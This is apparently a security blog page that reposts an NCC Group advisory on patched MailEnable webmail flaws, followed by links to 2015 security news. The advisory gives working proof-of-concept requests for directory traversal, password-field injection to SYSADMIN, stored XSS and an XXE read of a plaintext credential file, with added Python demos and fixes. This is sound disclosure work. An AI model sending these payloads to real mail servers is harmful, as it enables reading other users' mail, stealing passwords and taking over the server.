~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
1) Directory Traversal - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
In several places the MailEnable web application performed no directory traversal checks at all.
Where a check did exist, it could be bypassed by using the "/.. /" pattern (a space character
after the second dot) rather than the usual "/../" pattern.
As a result it was possible to:
- Share other users' folders to read their messages
- Read other users' messages
- Upload files into other directories by using directory traversal in the File Upload module
- Delete any file from the server by using the send email functionality
** Example 1: Sharing other users' folders to read their messages
PoC (ID and Folder parameters were affected):
The following request shared another user's INBOX:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GRANTACCESS&Browser=2&Folder=%2F../anotherUser/Inbox&ME_ACE=EVERYONE&ME_MAILBOX_NAME=&ME_ACCESS=FULL&DT=1419288553278
The following request was sent to use this shared folder and enable access to another
user's emails:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=ADDCONNECTION&Browser=2&Mailbox=anotherUser&Folder=%2FInbox&DT=1419289069638
** Example 2: Reading other users' messages
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space characters):
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GETMESSAGE&Browser=2&Folder=/X/..+/..+/anotherUser/&ID=./Inbox/DEFAULT.MAI&BODY=0&DT=1419293886037
** Example 3: Uploading files in other directories by using directory traversal in the File Upload module
PoC (Folder parameter was affected):
POST /MEWebMail/Mondo/lang/sys/Forms/FLS/list.aspx?TS=1419286047604&Folder=%24FILEROOT%2f/../../../../../ HTTP/1.1
Host: example.com
Cookie: [VALID_COOKIES_HERE]
Content-Type: multipart/form-data;
boundary=---------------------------12571835021337
Content-Length: [VALID_LENGTH]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATE"
[VALID_VIEWSTATE_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
[VALID_VIEWSTATEGENERATOR_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="ME_SID"
[VALID_ME_SID_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="uscFileUpload$FileUploader";
filename="testfile.aspx"
Content-Type: application/octet-stream
[data here]
-----------------------------12571835021337--
** Example 4: Deleting arbitrary files from the server by using the send email functionality
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space
characters):
POST /MEWebMail/Mondo/Servlet/request.aspx HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
MailEnable-SessionId: [VALID_SESSIONID_HERE]
Content-Length: [VALID_LENGTH]
Cookie: [VALID_COOKIES_HERE]
Cmd=SENDMESSAGE&ID=xxx\..+\..+\xxxxxxxxx&Folder=%5cDraftsxxxx&MsgBody=test&HTMLFormat=1&FromRecipients=%5BDEFAULT%5D&ToRecipients=user%40test.com&CCRecipients=&BCCRecipients=&Subject=test&Priority=3&Notify=false&PostOffice=DEFAULT&Mailbox=testuser&SessionKey=0e7a00032f33230f7c65092c540e690620&IdentityID=[DEFAULT]&CS=Send
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
2) Privilege Escalation - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The username, password, and user-role fields were stored in a TAB-delimited plain-text file
("AUTH.TAB") with no escaping of user-supplied values. A password containing TAB and newline
characters therefore injected extra fields and records, which made it possible to change the
user's role (or add a new user).
As an example, after changing the password to "Password12%09DEFAULT%09SYSADMIN%09%0A" (%09 is
a TAB and %0A a newline; the request was modified with a web proxy) in a change password
request, the "AUTH.TAB" file was changed as follows (the delimiter was a TAB character):
testuser@DEFAULT 1 Password12 DEFAULT SYSADMIN
DEFAULT USER
Now, "testuser" could log in as an admin user (to reset other users' passwords as an example).
This was possible via the mobile version of the admin section ("/MEAdmin/Mobile/") even when
the admin panel was disabled.
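The following Python is an added example, not code from the advisory or from MailEnable, that reproduces the record injection above and shows the minimal fix. The record layout (account, a "1" column whose meaning the advisory does not give, password, post office, role) is read off the example line above; the loader behaviour of ignoring lines with fewer than five fields is my assumption, as is the constructed store.

```python
from typing import List, NamedTuple


class AuthRecord(NamedTuple):
    account: str     # "mailbox@postoffice", as in the advisory's example line
    flag: str        # the "1" column; the advisory does not say what it means
    password: str    # stored in the clear, which is what made the XXE read useful
    postoffice: str
    role: str        # "USER", "ADMIN" and "SYSADMIN" appear in the advisory


DELIMITERS = ("\t", "\n", "\r")


def serialize_unsafe(rec: AuthRecord) -> str:
    # The vulnerable behaviour: fields joined with TAB, record ended with a
    # newline, and nothing the user supplied is escaped or rejected.
    return "\t".join(rec) + "\n"


def serialize_safe(rec: AuthRecord) -> str:
    # Minimal fix for the injection: refuse any field carrying a delimiter.
    # Not storing the password in the clear is the other half of the fix and
    # is outside what this block shows.
    for field in rec:
        if any(ch in field for ch in DELIMITERS):
            raise ValueError("field contains a record or field delimiter")
    return "\t".join(rec) + "\n"


def parse_auth_tab(text: str) -> List[AuthRecord]:
    # Assumed loader: one record per line, TAB-separated, lines with fewer
    # than five fields ignored. Extra trailing fields are dropped.
    records = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) >= 5:
            records.append(AuthRecord(*fields[:5]))
    return records


def change_password(store: str, account: str, new_password: str, safe: bool) -> str:
    # Rewrites the account's record with the new password using either the
    # vulnerable or the hardened serializer and returns the new file content.
    out = []
    for rec in parse_auth_tab(store):
        if rec.account == account:
            rec = rec._replace(password=new_password)
        out.append(serialize_safe(rec) if safe else serialize_unsafe(rec))
    return "".join(out)


# Constructed store holding one ordinary user (not a real AUTH.TAB).
STORE = serialize_unsafe(AuthRecord("testuser@DEFAULT", "1", "OldPass1", "DEFAULT", "USER"))
# The crafted password from the advisory, URL-decoded (%09 = TAB, %0A = LF).
CRAFTED = "Password12\tDEFAULT\tSYSADMIN\t\n"

if __name__ == "__main__":
    tampered = change_password(STORE, "testuser@DEFAULT", CRAFTED, safe=False)
    print(repr(tampered))
    print(parse_auth_tab(tampered))
```

Running it shows the tampered file splitting into the two lines the advisory prints: the first line now carries the role SYSADMIN, and the leftover "DEFAULT USER" tail becomes a short second line that a tolerant loader ignores.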
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
3) Stored XSS - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The anti-XSS protection of emails in the MailEnable application was bypassed when an HTML tag
was not closed properly. As a result, it was possible to send an email containing JavaScript
code which would be executed as soon as a victim user viewed the message. An attacker could
set permanent rules for redirecting emails, hijack other emails' contents, share users'
folders, or exploit other vulnerabilities within the MailEnable application to gain admin
access to the application.
PoC ("+" sign was used to encode the space characters):
1337+Message+Body<img/src=x+onerror=alert('XSS-HERE!')+
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
4) XXE - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The email settings handler parsed the XML document supplied in the "Options" parameter with
external entities enabled (XXE). As a result, it was possible to read local files or scan the
internal network. Because the plain-text email passwords were stored in the "AUTH.TAB" file,
the passwords themselves could be read this way.
PoC:
The following request was sent to read the first line of the "AUTH.TAB" file
(with Postmaster's password) by using the Background Image URL parameter:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=SET-MBXOPTIONS&Browser=2&Options=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f><!DOCTYPE+options+[+<!ELEMENT+options+ANY+>+<!ENTITY+xxe+SYSTEM+"file%3a///C:\Program+Files\Mail+Enable\Config\AUTH.TAB"+>]><options><option><name><![CDATA[WebMailWatermarkURL]]></name><value>%26xxe;</value></option></options>&DT=1419127432547
After this request was sent, the Postmaster's password was reflected in the HTML of every page,
as shown below:
...
<style type="text/css">
.custBg_img
{background:url(/MEWebMail/Mondo/skins/Pacific/&quot;Postmaster@DEFAULT 1 Password1
DEFAULT ADMIN) no-repeat;background-position:left bottom;background-repeat:no-repeat;}
.custBg_opacity {opacity:0.2;filter:Alpha(opacity=20);-msfilter:"Alpha(Opacity=20)";}
</style>
...
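The following Python is an added example, not code from the advisory or from MailEnable. It decodes the advisory's PoC URL the way the server would have seen it, so the entity declaration is visible, and then shows a hardened "Options" handler that refuses any document carrying a DTD before the XML parser touches it. The benign document and the decoder are constructed for the demonstration; the element names come from the PoC.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict
from urllib.parse import unquote_plus

# The advisory's PoC URL, on one line.
POC_URL = (r'/MEWebMail/Mondo/Servlet/request.aspx?Cmd=SET-MBXOPTIONS&Browser=2'
           r'&Options=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f>'
           r'<!DOCTYPE+options+[+<!ELEMENT+options+ANY+>+<!ENTITY+xxe+SYSTEM+'
           r'"file%3a///C:\Program+Files\Mail+Enable\Config\AUTH.TAB"+>]>'
           r'<options><option><name><![CDATA[WebMailWatermarkURL]]></name>'
           r'<value>%26xxe;</value></option></options>&DT=1419127432547')

# Constructed benign document of the same shape (the option name is the one
# the PoC targets; the value is made up).
BENIGN = ('<?xml version="1.0"?><options><option>'
          '<name><![CDATA[WebMailWatermarkURL]]></name>'
          '<value>skins/Pacific/bg.png</value></option></options>')

DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


def query_params(url: str) -> Dict[str, str]:
    # Small query-string decoder so the check sees what the server saw:
    # "+" is a space, %xx is decoded, and the value keeps its raw "<" and ">".
    query = url.split("?", 1)[1] if "?" in url else url
    params: Dict[str, str] = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def has_dtd(xml_text: str) -> bool:
    # Any DOCTYPE or ENTITY declaration is where XXE lives; a settings
    # document never legitimately needs one.
    return DTD_MARKER.search(xml_text) is not None


def parse_options(xml_text: str) -> Dict[str, str]:
    # Hardened handler: refuse DTDs up front, then read name/value pairs.
    # In a real handler also disable DTD processing and external entity
    # resolution in the XML library itself; this check is defence in depth.
    if has_dtd(xml_text):
        raise ValueError("XML with DOCTYPE/ENTITY declarations is not accepted")
    root = ET.fromstring(xml_text)
    options: Dict[str, str] = {}
    for option in root.findall("option"):
        name = (option.findtext("name") or "").strip()
        if name:
            options[name] = option.findtext("value") or ""
    return options


if __name__ == "__main__":
    decoded = query_params(POC_URL)["Options"]
    print(decoded)
    print("DTD present:", has_dtd(decoded))
    print(parse_options(BENIGN))
```

The decoded value makes the attack plain: an external entity pointing at AUTH.TAB is declared in the internal DTD subset and then referenced as the watermark URL, which is why the file's first line ended up inside the CSS of every page.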
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Upgrade to the latest version. Fixed versions are as follows:
Version 8.60 (the current version)
Version 7.60
Version 6.88
Version 5.62
Release notes are as follows:
http://www.mailenable.com/Standard-ReleaseNotes.txt
http://www.mailenable.com/Professional-ReleaseNotes.txt
http://www.mailenable.com/Enterprise-ReleaseNotes.txt
http://www.mailenable.com/Premium-ReleaseNotes.txt
https://www.mailenable.com/Premium-ReleaseNotes5.txt
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/

THE CIA CAMPAIGN TO STEAL APPLE’S SECRETS

RESEARCHERS WORKING with the Central Intelligence Agency have conducted a multi-year, sustained effort to break the security of Apple’s iPhones and iPads, according to top-secret documents obtained by The Intercept.

The security researchers presented their latest tactics and achievements at a secret annual gathering, called the “Jamboree,” where attendees discussed strategies for exploiting security flaws in household and commercial electronics. The conferences have spanned nearly a decade, with the first CIA-sponsored meeting taking place a year before the first iPhone was released.

more here........https://firstlook.org/theintercept/2015/03/10/ispy-cia-campaign-steal-apples-secrets/

A Triple-A Approach to Telephone Security

With technology, we are constantly looking to improve security. We moved from HTTP to HTTPS to help secure online transactions and mitigate man-in-the-middle attacks. With DNS, we have started to implement DNSSEC. Why are we not looking backward at the cornerstone of modern communication, the device that still ties everyone together? The telephone.

There have been minor updates to the user experience, but there are definitely security enhancements that need to be made. Today, we have auto-dialers claiming to be companies we know and trust, like the Canadian airline WestJet. These scammers mask their true number with spoofed caller ID, which makes them impossible to block. We can improve the end user telephone experience by looking at the basics of computer security and implementing a Triple-A approach to telephone security: authentication, authorization, and accounting.

more here.........http://www.tripwire.com/state-of-security/security-awareness/a-triple-a-approach-to-telephone-security/

Malware Database

Warning: The site contains live malware. Use at your own risk here.........http://oc.gtisc.gatech.edu:8080/


and also another malware analysis engine and repository here....https://avcaesar.malware.lu/

peCloak.py – An Experiment in AV Evasion

I just wrapped up the Offensive Security Cracking The Perimeter (CTP) course and one of the topics was AV evasion. Although I write a lot of custom scripts and tools, when it comes to AV evasion, I typically rely on the tools and methods of others (Veil, powershell, python, custom shellcode). That said, the great thing about courses like CTP is they give me an excuse to investigate a topic that I haven’t had an opportunity to delve into in much detail.

The CTP course was developed several years ago and I was curious how far AV vendors have come since then; so, after completing the course module, I decided to delve a bit further and devised a little experiment to see how easy it would be to consistently bypass detection of some of the market leading AV products. I spent a weekend tapping out some code and what resulted was a simple proof-of-concept python script I dubbed “peCloak” which automates the process of hiding a malicious windows executable from AV detection (a copy of the beta version is available at the end of this post).

more here.........http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/

Revisiting Xen’s x86 Emulation: Xen XSA 123

In my last blog post, I gave an overview about recent vulnerabilities discovered in the x86 emulation layer of Xen. While both of the discussed vulnerabilities only allow for guest privilege escalation, the complexity of the involved code seemed to indicate that even more interesting bugs could be discovered. So I spent some time searching for memory corruption issues and discovered a very interesting bug that resulted in XSA 123 . This post gives an overview about the root cause of the bug and a short description of exploitation challenges. A follow-up post will describe possible exploitation strategies in more detail.

more here........http://www.insinuator.net/2015/03/xen-xsa-123/

Noriben Beta for Version 1.6 - Portable, Simple, Malware Analysis Sandbox

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben not only runs malware the way a sandbox does, it also logs system-wide events while you run the sample by hand in whatever way is needed to make it execute. For example, it can listen as you run malware that requires particular command line options, or watch the system as you step through malware in a debugger.


more here......https://github.com/Rurik/Noriben

MySQL 5.7.6 is out with security and safety

Today Oracle released MySQL 5.7.6 milestone 16. With this, MySQL 5.7 has been in development for over 2 years.
Compared to MySQL 5.6, the changes are quite extensive. The main effort of the team has been focused on speed, with performance reportedly improved from 2 to 3 times compared to previous releases.
A full list of what is new would take too much space here, but I would like to mention some key points here..........http://datacharmer.blogspot.fr/2015/03/mysql-5.html

Wikimedia v. NSA: Wikimedia Foundation files suit against NSA to challenge upstream mass surveillance

Today, the Wikimedia Foundation is filing suit against the National Security Agency (NSA) and the Department of Justice (DOJ) of the United States [1]. The lawsuit challenges the NSA’s mass surveillance program, and specifically its large-scale search and seizure of internet communications — frequently referred to as “upstream” surveillance. Our aim in filing this suit is to end this mass surveillance program in order to protect the rights of our users around the world. We are joined by eight other organizations [2] and represented by the American Civil Liberties Union (ACLU).

more here.......https://blog.wikimedia.org/2015/03/10/wikimedia-v-nsa/

Hack a Car Part 1 and 2

A complete guide to hacking your vehicle bus on the cheap & easy hardware interface

part 1 here....https://0xicf.wordpress.com/2015/03/04/hack-a-car-part-one/

part 2 here...https://0xicf.wordpress.com/2015/03/09/hack-a-car-part-two/

HBO NOW DNSSEC Misconfiguration Makes Site Unavailable From Comcast Networks (Fixed Now)

Wow! Talk about insanely bad timing… yesterday at Apple’s big event, HBO announced “HBO NOW”, a new streaming service available for only $15/month that will give you access to all of HBO’s content. This was great news for those people who want to “cut the cord” and not have to pay for a cable TV subscription to get content such as this from HBO. All you had to do was go to order.hbonow.com to get started.
One slight problem – the folks at HBO had signed the hbonow.com domain with DNSSEC, but had not done so correctly!

more here.......http://www.internetsociety.org/deploy360/blog/2015/03/hbo-now-dnssec-misconfiguration-makes-site-unavailable-from-comcast-networks-fixed-now/